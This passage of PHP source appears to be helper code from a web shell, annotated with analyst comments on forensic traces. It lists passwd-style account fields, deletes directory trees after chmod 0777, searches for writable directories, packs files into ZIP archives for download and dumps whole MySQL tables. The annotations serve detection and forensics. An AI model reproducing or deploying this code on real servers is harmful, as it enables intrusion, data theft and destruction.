Passwd: ' . $array['passwd'] . '
Uid: ' . $array['uid'] . '
gid: ' . $array['gid'] . '
Gecos: ' . $array['gecos'] . '
Dir: ' . $array['dir'] . '
Shell: ' . $array['shell'] . '">' . $array['name'] . '</a>';
        }
    }
    return '';
}
1762 // Delete dir
/**
 * Recursively delete a directory and everything under it.
 *
 * Analyst note: before each removal the entry is chmod'ed to 0777, so a
 * partially completed run leaves world-writable files and directories
 * behind; unexpected 0777 modes under the web root are a useful forensic
 * trace. All chmod/unlink/rmdir errors are suppressed.
 *
 * NOTE(review): the result of dir() is used without a check, and the loop
 * condition treats any falsy entry name as end-of-directory.
 *
 * @param string $deldir Directory to remove.
 * @return int 1 when the final rmdir() succeeded, otherwise 0.
 */
function deltree($deldir) {
    $mydir = @dir($deldir);
    while ($file = $mydir->read()) {
        if ((is_dir($deldir . '/' . $file)) && ($file != '.') && ($file != '..')) {
            @chmod($deldir . '/' . $file, 0777);
            deltree($deldir . '/' . $file);
        }
        if (is_file($deldir . '/' . $file)) {
            @chmod($deldir . '/' . $file, 0777);
            @unlink($deldir . '/' . $file);
        }
    }
    $mydir->close();
    @chmod($deldir, 0777);
    return @rmdir($deldir) ? 1 : 0;
}
1779 // Background
/**
 * Return the CSS class for the next table row, alternating between
 * 'alt1' and 'alt2'.
 *
 * Uses and increments the global counter $bgc on every call.
 *
 * @return string 'alt1' for even counter values, 'alt2' for odd ones.
 */
function bg() {
    global $bgc;
    $rowIndex = $bgc++;
    if ($rowIndex % 2 == 0) {
        return 'alt1';
    }
    return 'alt2';
}
1784 // Get path
/**
 * Normalise a directory path: forward slashes only, doubled slashes
 * collapsed once, and a trailing slash guaranteed.
 *
 * @param string $scriptpath Directory used when $nowpath is '.'.
 * @param string $nowpath    Requested directory.
 * @return string Normalised directory path ending in '/'.
 */
function getPath($scriptpath, $nowpath) {
    $dir = ($nowpath == '.') ? $scriptpath : $nowpath;
    // Array search terms are applied in order: backslashes first, then '//'.
    $dir = str_replace(array('\\', '//'), '/', $dir);
    return (substr($dir, -1) != '/') ? $dir . '/' : $dir;
}
1796 // Get up path
/**
 * Return the parent of a slash-terminated directory path.
 *
 * The path is split on '/', the last two segments (the directory name and
 * the empty segment after the trailing slash) are dropped when there are
 * more than two segments, and the result is re-joined with a trailing slash.
 *
 * @param string $nowpath Directory path ending in '/'.
 * @return string Parent directory path ending in '/'.
 */
function getUpPath($nowpath) {
    $segments = explode('/', $nowpath);
    if (count($segments) > 2) {
        $segments = array_slice($segments, 0, -2);
    }
    return str_replace('//', '/', implode('/', $segments) . '/');
}
1807 // Config
/**
 * Read a php.ini value and present on/off style settings as 'Yes' / 'No'.
 *
 * The comparisons are loose (==), exactly as in the listing, so any value
 * that loosely equals 0 is shown as 'No' and any that loosely equals 1 as
 * 'Yes'; everything else is returned unchanged.
 *
 * @param string $varname Configuration directive name.
 * @return mixed 'Yes', 'No', or the raw get_cfg_var() result.
 */
function getcfg($varname) {
    $value = get_cfg_var($varname);
    if ($value == 0) {
        return 'No';
    }
    if ($value == 1) {
        return 'Yes';
    }
    return $value;
}
1818 // Function name
/**
 * Report whether a function with the given name is defined.
 *
 * @param string $funName Function name to probe.
 * @return string 'Yes' when function_exists() is true, otherwise 'No'.
 */
function getfun($funName) {
    if (function_exists($funName)) {
        return 'Yes';
    }
    return 'No';
}
/**
 * Recursively walk a directory tree and collect every sub-directory that the
 * PHP process can write to.
 *
 * Analyst note: this is the sample's writable-directory survey. It touches
 * every directory below $dir (opendir/readdir/is_writable), which shows up
 * as a burst of directory reads by the web-server account. Keeping the web
 * root read-only for that account leaves this list empty.
 *
 * Results accumulate in the global $dirdata array, indexed by the global
 * counter $j; paths are stored relative to the global $nowpath.
 *
 * @param string $dir Directory to scan.
 * @return array The global $dirdata after scanning, or an empty array when
 *               $dir cannot be opened.
 */
function GetList($dir) {
    global $dirdata, $j, $nowpath;
    !$j && $j = 1; // first call: start numbering at 1
    if ($dh = opendir($dir)) {
        while ($file = readdir($dh)) {
            $f = str_replace('//', '/', $dir . '/' . $file);
            if ($file != '.' && $file != '..' && is_dir($f)) {
                if (is_writable($f)) {
                    // Record only writable directories.
                    $dirdata[$j]['filename'] = str_replace($nowpath, '', $f);
                    $dirdata[$j]['mtime'] = @date('Y-m-d H:i:s', filemtime($f));
                    $dirdata[$j]['dirchmod'] = getChmod($f);
                    $dirdata[$j]['dirperm'] = getPerms($f);
                    $dirdata[$j]['dirlink'] = ue($dir);
                    $dirdata[$j]['server_link'] = $f;
                    $dirdata[$j]['client_link'] = ue($f);
                    $j++;
                }
                // Descend regardless of whether this level was writable.
                GetList($f);
            }
        }
        closedir($dh);
        clearstatcache();
        return $dirdata;
    } else {
        return array();
    }
}
/**
 * Run a SQL statement and classify the outcome.
 *
 * The statement text is sent to mysql_query() exactly as received.
 *
 * @param string $sql SQL text.
 * @return int 0 on failure, 1 when a result-set resource came back,
 *             2 when the statement succeeded without a result set.
 */
function qy($sql) {
    //echo $sql.'<br>';
    $res = $error = '';
    if (!$res = @mysql_query($sql)) {
        return 0;
    } else if (is_resource($res)) {
        return 1;
    } else {
        return 2;
    }
    // Unreachable: every branch above returns.
    return 0;
}
/**
 * Thin wrapper around mysql_query() with errors suppressed.
 *
 * The statement is executed on whatever connection the mysql extension
 * treats as current; no link argument is accepted or passed on.
 *
 * @param string $sql SQL text, sent unmodified.
 * @return mixed Whatever mysql_query() returns.
 */
function q($sql) {
    return @mysql_query($sql);
}
/**
 * Release a MySQL result set.
 *
 * @param resource $qy Result handle returned by q().
 */
function fr($qy) {
    mysql_free_result($qy);
}
/**
 * Format a byte count as a short human-readable string.
 *
 * Values are rounded to two decimals and suffixed with ' G', ' M', ' K' or
 * ' B'. The thresholds are strict (>), so exactly 1024 is shown as bytes.
 *
 * @param int|float $size Size in bytes.
 * @return string Formatted size.
 */
function sizecount($size) {
    $gib = 1073741824;
    $mib = 1048576;
    $kib = 1024;
    if ($size > $gib) {
        return round($size / $gib * 100) / 100 . ' G';
    }
    if ($size > $mib) {
        return round($size / $mib * 100) / 100 . ' M';
    }
    if ($size > $kib) {
        return round($size / $kib * 100) / 100 . ' K';
    }
    return $size . ' B';
}
1879 // Zip
/**
 * Minimal in-memory ZIP writer.
 *
 * Analyst note: the class reads files or whole directory trees from disk and
 * assembles a ZIP archive entirely in memory ($out), which the surrounding
 * script can then send in a response. Large reads of many files by the PHP
 * worker followed by a single large response are the observable pattern.
 * It is written in PHP 4 style (`var` properties, constructor named after
 * the class).
 */
class PHPZip {
    // Finished archive bytes, filled by the constructor.
    var $out = '';
    /**
     * Build the archive.
     *
     * @param string|array $dir A directory to pack recursively, or an array
     *                          of file paths to pack by base name.
     * @return int 1 when gzcompress() exists, 0 otherwise (the listing uses
     *             a PHP 4 style constructor, so this is an ordinary return).
     */
    function PHPZip($dir) {
        if (@function_exists('gzcompress')) {
            $curdir = getcwd();
            if (is_array($dir)) $filelist = $dir;
            else {
                $filelist = $this->GetFileList($dir); // absolute-style paths under $dir
                // Append each path again with the "$dir/" prefix stripped; these
                // relative names are the ones that resolve after the chdir() below.
                foreach ($filelist as $k => $v) $filelist[] = substr($v, strlen($dir) + 1);
            }
            if ((!empty($dir)) && (!is_array($dir)) && (file_exists($dir))) chdir($dir);
            else chdir($curdir);
            if (count($filelist) > 0) {
                foreach ($filelist as $filename) {
                    if (is_file($filename)) {
                        $fd = fopen($filename, 'r');
                        $content = @fread($fd, filesize($filename));
                        fclose($fd);
                        // For an explicit file list, entries are stored flat by base name.
                        if (is_array($dir)) $filename = basename($filename);
                        $this->addFile($content, $filename);
                    }
                }
                $this->out = $this->file();
                chdir($curdir);
            }
            return 1;
        } else return 0;
    }
    // Show file list
    /**
     * Recursively list everything below a directory.
     *
     * The accumulator is a function-level static, so results persist across
     * separate calls within one request.
     *
     * @param string $dir Directory to walk.
     * @return array|null Collected paths (null when nothing was ever added).
     */
    function GetFileList($dir) {
        static $a;
        if (is_dir($dir)) {
            if ($dh = opendir($dir)) {
                while ($file = readdir($dh)) {
                    if ($file != '.' && $file != '..') {
                        $f = $dir . '/' . $file;
                        if (is_dir($f)) $this->GetFileList($f);
                        $a[] = $f;
                    }
                }
                closedir($dh);
            }
        }
        return $a;
    }
    // Local file records, one string per added file.
    var $datasec = array();
    // Central-directory records, one string per added file.
    var $ctrl_dir = array();
    // End-of-central-directory signature plus four zero bytes.
    var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
    // Byte offset at which the next local record will start.
    var $old_offset = 0;
    /**
     * Pack a Unix timestamp into the 32-bit DOS date/time layout.
     *
     * @param int $unixtime Timestamp; 0 means "now". Years before 1980 are
     *                      clamped to 1980-01-01 00:00:00.
     * @return int Packed DOS date/time.
     */
    function unix2DosTime($unixtime = 0) {
        $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
        if ($timearray['year'] < 1980) {
            $timearray['year'] = 1980;
            $timearray['mon'] = 1;
            $timearray['mday'] = 1;
            $timearray['hours'] = 0;
            $timearray['minutes'] = 0;
            $timearray['seconds'] = 0;
        } // end if
        return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) | ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
    }
    /**
     * Append one file to the archive.
     *
     * @param string $data File contents.
     * @param string $name Name stored in the archive (backslashes become '/').
     * @param int    $time Unix timestamp for the entry; 0 means "now".
     */
    function addFile($data, $name, $time = 0) {
        $name = str_replace('\\', '/', $name);
        $dtime = dechex($this->unix2DosTime($time));
        // Reorder the hex digits byte-wise into little-endian '\xNN' escape text.
        $hexdtime = '\x' . $dtime[6] . $dtime[7] . '\x' . $dtime[4] . $dtime[5] . '\x' . $dtime[2] . $dtime[3] . '\x' . $dtime[0] . $dtime[1];
        // eval() turns that escape text into raw bytes. Its input here is built
        // only from dechex() output above, not from request data.
        eval('$hexdtime = "' . $hexdtime . '";');
        // Local file header.
        $fr = "\x50\x4b\x03\x04";
        $fr.= "\x14\x00";
        $fr.= "\x00\x00";
        $fr.= "\x08\x00";
        $fr.= $hexdtime;
        $unc_len = strlen($data);
        $crc = crc32($data);
        $zdata = gzcompress($data);
        // Note: the length is taken before the 2 leading and 4 trailing bytes are cut off.
        $c_len = strlen($zdata);
        $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
        $fr.= pack('V', $crc);
        $fr.= pack('V', $c_len);
        $fr.= pack('V', $unc_len);
        $fr.= pack('v', strlen($name));
        $fr.= pack('v', 0);
        $fr.= $name;
        $fr.= $zdata;
        $fr.= pack('V', $crc);
        $fr.= pack('V', $c_len);
        $fr.= pack('V', $unc_len);
        $this->datasec[] = $fr;
        $new_offset = strlen(implode('', $this->datasec));
        // Central directory record for the same file.
        $cdrec = "\x50\x4b\x01\x02";
        $cdrec.= "\x00\x00";
        $cdrec.= "\x14\x00";
        $cdrec.= "\x00\x00";
        $cdrec.= "\x08\x00";
        $cdrec.= $hexdtime;
        $cdrec.= pack('V', $crc);
        $cdrec.= pack('V', $c_len);
        $cdrec.= pack('V', $unc_len);
        $cdrec.= pack('v', strlen($name));
        $cdrec.= pack('v', 0);
        $cdrec.= pack('v', 0);
        $cdrec.= pack('v', 0);
        $cdrec.= pack('v', 0);
        $cdrec.= pack('V', 32);
        // Offset of this file's local header, then advance for the next file.
        $cdrec.= pack('V', $this->old_offset);
        $this->old_offset = $new_offset;
        $cdrec.= $name;
        $this->ctrl_dir[] = $cdrec;
    }
    /**
     * Assemble the complete archive from the records collected so far.
     *
     * @return string Local records, central directory, and end-of-directory trailer.
     */
    function file() {
        $data = implode('', $this->datasec);
        $ctrldir = implode('', $this->ctrl_dir);
        return $data . $ctrldir . $this->eof_ctrl_dir . pack('v', sizeof($this->ctrl_dir)) . pack('v', sizeof($this->ctrl_dir)) . pack('V', strlen($ctrldir)) . pack('V', strlen($data)) . "\x00\x00";
    }
}
1994 // Dump mysql
/**
 * Dump one MySQL table as SQL text: DROP TABLE, CREATE TABLE, then one
 * INSERT statement per row.
 *
 * Analyst note: this is the data-export routine. It issues SHOW FIELDS,
 * SHOW KEYS and an unbounded `SELECT *` against the table, a sequence that
 * stands out in database query logs when it originates from the web
 * application's account. The output goes either to a file handle (a dump
 * file appearing on disk) or straight into the HTTP response. $table is
 * interpolated into every statement without quoting.
 *
 * The routine depends on mysql_*, each() and the legacy implode() argument
 * order, which ties it to old PHP runtimes.
 *
 * @param string        $table Table name.
 * @param resource|int  $fp    Open file handle to write to, or 0 to echo.
 */
function sqldumptable($table, $fp = 0) {
    $tabledump = "DROP TABLE IF EXISTS $table;\n";
    $tabledump.= "CREATE TABLE $table (\n";
    $firstfield = 1;
    // Column definitions.
    $fields = q("SHOW FIELDS FROM $table");
    while ($field = mysql_fetch_array($fields)) {
        if (!$firstfield) {
            $tabledump.= ",\n";
        } else {
            $firstfield = 0;
        }
        $tabledump.= " $field[Field] $field[Type]";
        if (!empty($field["Default"])) {
            $tabledump.= " DEFAULT '$field[Default]'";
        }
        if ($field['Null'] != "YES") {
            $tabledump.= " NOT NULL";
        }
        if ($field['Extra'] != "") {
            $tabledump.= " $field[Extra]";
        }
    }
    fr($fields);
    // Index definitions, grouped by key name; unique keys are tagged "UNIQUE|name".
    $keys = q("SHOW KEYS FROM $table");
    while ($key = mysql_fetch_array($keys)) {
        $kname = $key['Key_name'];
        if ($kname != "PRIMARY" && $key['Non_unique'] == 0) {
            $kname = "UNIQUE|$kname";
        }
        if (!is_array($index[$kname])) {
            $index[$kname] = array();
        }
        $index[$kname][] = $key['Column_name'];
    }
    fr($keys);
    while (list($kname, $columns) = @each($index)) {
        $tabledump.= ",\n";
        $colnames = implode($columns, ",");
        if ($kname == "PRIMARY") {
            $tabledump.= " PRIMARY KEY ($colnames)";
        } else {
            // The "UNIQUE|" tag is stripped and the key is written as a plain KEY.
            if (substr($kname, 0, 6) == "UNIQUE") {
                $kname = substr($kname, 7);
            }
            $tabledump.= " KEY $kname ($colnames)";
        }
    }
    $tabledump.= "\n);\n\n";
    if ($fp) {
        fwrite($fp, $tabledump);
    } else {
        echo $tabledump;
    }
    // Row data: one INSERT per row, written out as it is produced.
    $rows = q("SELECT * FROM $table");
    $numfields = mysql_num_fields($rows);
    while ($row = mysql_fetch_array($rows)) {
        $tabledump = "INSERT INTO $table VALUES(";
        $fieldcounter = - 1;
        $firstfield = 1;
        while (++$fieldcounter < $numfields) {
            if (!$firstfield) {
                $tabledump.= ", ";
            } else {
                $firstfield = 0;
            }
            if (!isset($row[$fieldcounter])) {
                $tabledump.= "NULL";
            } else {
                $tabledump.= "'" . mysql_escape_string($row[$fieldcounter]) . "'";
            }
        }
        $tabledump.= ");\n";
        if ($fp) {
            fwrite($fp, $tabledump);
        } else {
            echo $tabledump;
        }
    }
    fr($rows);
    if ($fp) {
        fwrite($fp, "\n");
    } else {
        echo "\n";
    }
}
/**
 * URL-encode a string (shorthand for urlencode()).
 *
 * @param string $str Raw value.
 * @return string Encoded value.
 */
function ue($str) {
    $encoded = urlencode($str);
    return $encoded;
}
/**
 * Write a string to the response followed by a newline.
 *
 * Nothing is escaped; callers pass ready-made markup.
 *
 * @param string $str Text or markup to output.
 */
function p($str) {
    echo $str, "\n";
}
/**
 * Output the opening tag of a full-width layout table.
 */
function tbhead() {
    $openTag = '<table width="100%" border="0" cellpadding="4" cellspacing="0">';
    p($openTag);
}
/**
 * Output the closing tag of a layout table.
 */
function tbfoot() {
    $closeTag = '</table>';
    p($closeTag);
}
/**
 * Output a hidden form field.
 *
 * Both arguments are interpolated into the markup without HTML escaping.
 *
 * @param string $name  Used for both the id and name attributes.
 * @param string $value Field value.
 */
function makehide($name, $value = '') {
    p("<input id=\"$name\" type=\"hidden\" name=\"$name\" value=\"$value\" />");
}
/**
 * Output an <input> element described by an options array.
 *
 * Recognised keys, as read below: size (default 100), extra (raw attribute
 * text), type (default 'text'), title (label printed before the field),
 * class (default 'input'), name (also used as id), value, newline (wrap the
 * field in <p>). All values are interpolated without HTML escaping.
 *
 * @param array $arg Field options.
 */
function makeinput($arg = array()) {
    $arg['size'] = $arg['size'] > 0 ? "size=\"$arg[size]\"" : "size=\"100\"";
    $arg['extra'] = $arg['extra'] ? $arg['extra'] : '';
    !$arg['type'] && $arg['type'] = 'text';
    $arg['title'] = $arg['title'] ? $arg['title'] . '<br />' : '';
    $arg['class'] = $arg['class'] ? $arg['class'] : 'input';
    if ($arg['newline']) {
        p("<p>$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type]\" $arg[size] $arg[extra] /></p>");
    } else {
        p("$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type]\" $arg[size] $arg[extra] />");
    }
}
/**
 * Output a <select> element described by an options array.
 *
 * Recognised keys, as read below: onchange (raw handler text), title,
 * newline (wrap in <p>), name (also used as id), option (value => label
 * map), selected (key compared loosely against each option key).
 *
 * @param array $arg Select options.
 */
function makeselect($arg = array()) {
    if ($arg['onchange']) {
        $onchange = 'onchange="' . $arg['onchange'] . '"';
    }
    $arg['title'] = $arg['title'] ? $arg['title'] : '';
    if ($arg['newline']) p('<p>');
    // $onchange is only assigned above when an onchange handler was supplied.
    p("$arg[title] <select class=\"input\" id=\"$arg[name]\" name=\"$arg[name]\" $onchange>");
    if (is_array($arg['option'])) {
        foreach ($arg['option'] as $key => $value) {
            if ($arg['selected'] == $key) {
                p("<option value=\"$key\" selected>$value</option>");
            } else {
                p("<option value=\"$key\">$value</option>");
            }
        }
    }
    p("</select>");
    if ($arg['newline']) p('</p>');
}
/**
 * Output an opening <form> tag and an optional <h2> heading.
 *
 * Recognised keys, as read below: method (default 'post'), action, target,
 * name (default 'form1', also used as id), title.
 *
 * NOTE(review): the action default reads $self, which is not declared
 * global inside this function, so the default looks like it resolves to an
 * empty action (submit to the current URL).
 *
 * @param array $arg Form options.
 */
function formhead($arg = array()) {
    !$arg['method'] && $arg['method'] = 'post';
    !$arg['action'] && $arg['action'] = $self;
    $arg['target'] = $arg['target'] ? "target=\"$arg[target]\"" : '';
    !$arg['name'] && $arg['name'] = 'form1';
    p("<form name=\"$arg[name]\" id=\"$arg[name]\" action=\"$arg[action]\" method=\"$arg[method]\" $arg[target]>");
    if ($arg['title']) {
        p('<h2>' . $arg['title'] . ' »</h2>');
    }
}
/**
 * Output a <textarea> wrapped in <p>.
 *
 * Recognised keys, as read below: cols (default 100), rows (default 25),
 * title, name (also used as id), extra (raw attribute text), value (placed
 * between the tags without HTML escaping).
 *
 * @param array $arg Textarea options.
 */
function maketext($arg = array()) {
    !$arg['cols'] && $arg['cols'] = 100;
    !$arg['rows'] && $arg['rows'] = 25;
    $arg['title'] = $arg['title'] ? $arg['title'] . '<br />' : '';
    p("<p>$arg[title]<textarea class=\"area\" id=\"$arg[name]\" name=\"$arg[name]\" cols=\"$arg[cols]\" rows=\"$arg[rows]\" $arg[extra]>$arg[value]</textarea></p>");
}
/**
 * Output a submit button followed by the closing </form> tag.
 *
 * NOTE(review): the id attribute is written with \" inside a single-quoted
 * string, so the backslashes are emitted literally into the page
 * (id=\"submit\"); that malformed attribute is a small but stable content
 * fingerprint of pages generated by this script.
 *
 * @param string $name Button name and id; defaults to 'submit'.
 */
function formfooter($name = '') {
    !$name && $name = 'submit';
    p('<p><input class="bt" name="' . $name . '" id=\"' . $name . '\" type="submit" value="Submit"></p>');
    p('</form>');
}
/**
 * Output only the closing </form> tag (no submit button).
 */
function formfoot() {
    $closeTag = '</form>';
    p($closeTag);
}
// Debug helper: print a value with print_r() inside <pre> tags
/**
 * Dump a value in print_r() format wrapped in <pre> tags.
 *
 * @param mixed $a Value to display.
 */
function pr($a) {
    $dump = print_r($a, true);
    echo '<pre>' . $dump . '</pre>';
}
2156 ?>